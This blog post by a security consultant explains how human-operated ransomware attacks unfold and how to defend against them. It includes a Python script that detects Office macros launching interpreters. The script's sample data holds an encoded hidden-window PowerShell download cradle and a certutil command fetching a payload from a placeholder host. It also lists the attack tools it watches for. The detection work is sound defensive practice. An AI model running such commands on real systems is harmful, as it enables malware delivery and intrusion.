How to defend against human-operated ransomware attacks

A growing threat to all organisations

[Image: NBC News article about the Ryuk ransomware attack on Universal Health Services]

What are human-operated ransomware attacks?

Skilled cyber criminals gain access to organisations' networks and then extort victims into paying ransoms by encrypting systems and threatening to leak sensitive data. Attacks typically unfold over weeks or months, as attackers compromise privileged accounts and gain access to key systems in order to maximise the damage they can cause before the ransomware is deployed. Well-known ransomware families and groups associated with these attacks include Ryuk, REvil, DoppelPaymer and Maze.

How are these attacks carried out?

Gaining access

In most cases, ransomware attackers gain access to organisations' networks through "distribution networks". These regularly send millions of untargeted phishing emails to organisations around the world (often disguised as overdue invoices, resumes or airline tickets) in an attempt to opportunistically compromise lucrative targets with malware such as the banking trojans Emotet, Dridex and TrickBot. The emails use tried and tested lures to persuade employees to run malicious files, most commonly by asking them to enable macros in a Microsoft Office attachment; the macro then launches a script interpreter or built-in Windows utility to download and run the next stage.
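The macro-to-shell execution chain described above is the earliest point at which this intrusion can be caught on the endpoint. The script below is an added example written for this page, not code from the original post or from any vendor or product. It runs a simple detection rule over a handful of constructed, Sysmon-style process-creation events (the field names Host, User, ParentImage, Image and CommandLine are an assumption for the example, not a vendor schema): it flags an Office process spawning a scripting interpreter or living-off-the-land binary, and separately flags an encoded PowerShell command line, while excluding the helper processes Office legitimately spawns so that ordinary printing or updating does not trigger it.

```python
"""Flag the macro-driven execution chain in a stream of process-creation events.

Added example for this page. The JSON-lines format below is a constructed,
simplified rendering of Sysmon Event ID 1 / Windows 4688 fields; the field
names are an assumption for the example, not a vendor schema.
"""
from __future__ import annotations

import json
import re
from pathlib import PureWindowsPath

# Office processes whose child processes are almost always macro-driven.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Interpreters and LOLBins a macro typically launches to stage a dropper.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe",
}

# Children Office spawns on its own in normal use (print spooler helper,
# Click-to-Run updater, crash reporter); excluded to avoid false positives.
BENIGN_CHILDREN = {"splwow64.exe", "officeclicktorun.exe", "werfault.exe"}

# "-e", "-ec", "-enc" or "-EncodedCommand" followed by a base64 blob.
ENCODED_PS = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")

# Constructed sample events: a macro launching encoded PowerShell, a benign
# print helper, an admin running PowerShell from Explorer, and an Excel macro
# using certutil to fetch a payload via cmd.exe.
SAMPLE_EVENTS = r"""
{"Host": "WS-0142", "User": "CORP\\jsmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"}
{"Host": "WS-0142", "User": "CORP\\jsmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"Host": "WS-0077", "User": "CORP\\admin-ops", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Get-Service -Name Spooler"}
{"Host": "WS-0203", "User": "CORP\\afinch", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c certutil -urlcache -split -f http://example.invalid/invoice.dat %TEMP%\\inv.dat"}
"""


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'winword.exe'."""
    return PureWindowsPath(path).name.lower()


def suspicious_reasons(event: dict) -> list[str]:
    """Return the list of rule hits for one event; empty means not flagged."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons: list[str] = []
    if parent in OFFICE_PARENTS and child in BENIGN_CHILDREN:
        return reasons  # known-good Office helper, never flag
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"office process {parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(cmdline):
        reasons.append("encoded PowerShell command line")
    return reasons


def scan(jsonl: str) -> list[dict]:
    """Parse JSON-lines events and return one alert per flagged event."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = suspicious_reasons(event)
        if reasons:
            alerts.append({
                "host": event.get("Host"),
                "user": event.get("User"),
                "parent": _basename(event.get("ParentImage", "")),
                "child": _basename(event.get("Image", "")),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']}: {alert['parent']} -> {alert['child']}")
        for reason in alert["reasons"]:
            print(f"    - {reason}")
```

Run against the sample, the first and last events are flagged (the first on both rules, the last on the Office-parent rule only) and the print helper and the administrator's interactive PowerShell are not. In production the same logic would run over Sysmon Event ID 1 or Windows Security 4688 records (with command-line auditing enabled) in the SIEM; the benign-child allow-list is the part that needs tuning per estate, and the encoded-command check catches the loader regardless of which application started it.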

Escalating privileges and compromising further systems

Attackers then perform reconnaissance and compromise privileged accounts and systems, relying on tools and techniques more commonly associated with cyber criminal groups such as FIN6, nation-state actors and red teams.

Exfiltrating data and deploying ransomware

With those privileged accounts, attackers identify and exfiltrate sensitive data, then deploy ransomware to as many systems as they can, including across multiple domains by abusing the trust relationships between them.

Why these attacks represent an increasingly dangerous threat

The growing scale, sophistication and frequency of these attacks make them an increasingly dangerous threat. Their devastating impact on people, on the livelihoods of employees and on the mental health of responders is often understated and untold. When the organisations targeted cannot afford to protect themselves from these sophisticated and well-resourced cyber criminal groups, the toll is especially unfair.

[Image: New York Times article on a ransomware attack suspected in a woman's death]

How to defend against these attacks?

Organisations should take a three-step approach to defend against these attacks; the slides below summarise the steps and the key capabilities that underpin them:

[Image: Slide from our recent talk at the SANS Cyber Defence Summit on the three steps organisations should take to defend against these attacks]
[Image: Slide from our recent talk at the SANS Cyber Defence Summit on key cyber security capabilities to defend against these attacks]
  1. Remediate internet-facing vulnerabilities and reduce the attack surface
  2. Protect privileged accounts from being compromised
  3. Remediate common hygiene issues used by attackers to escalate privileges
  4. Restrict the ability of an attacker to compromise further systems
  5. Rapidly detect and contain incidents before they escalate
[Image: Actionable recommendations from the Microsoft 365 Defender Threat Intelligence Team]

Written by

Hi, my name is Will. I'm a cyber security consultant living in London. I help companies defend against cyber attacks. Opinions my own.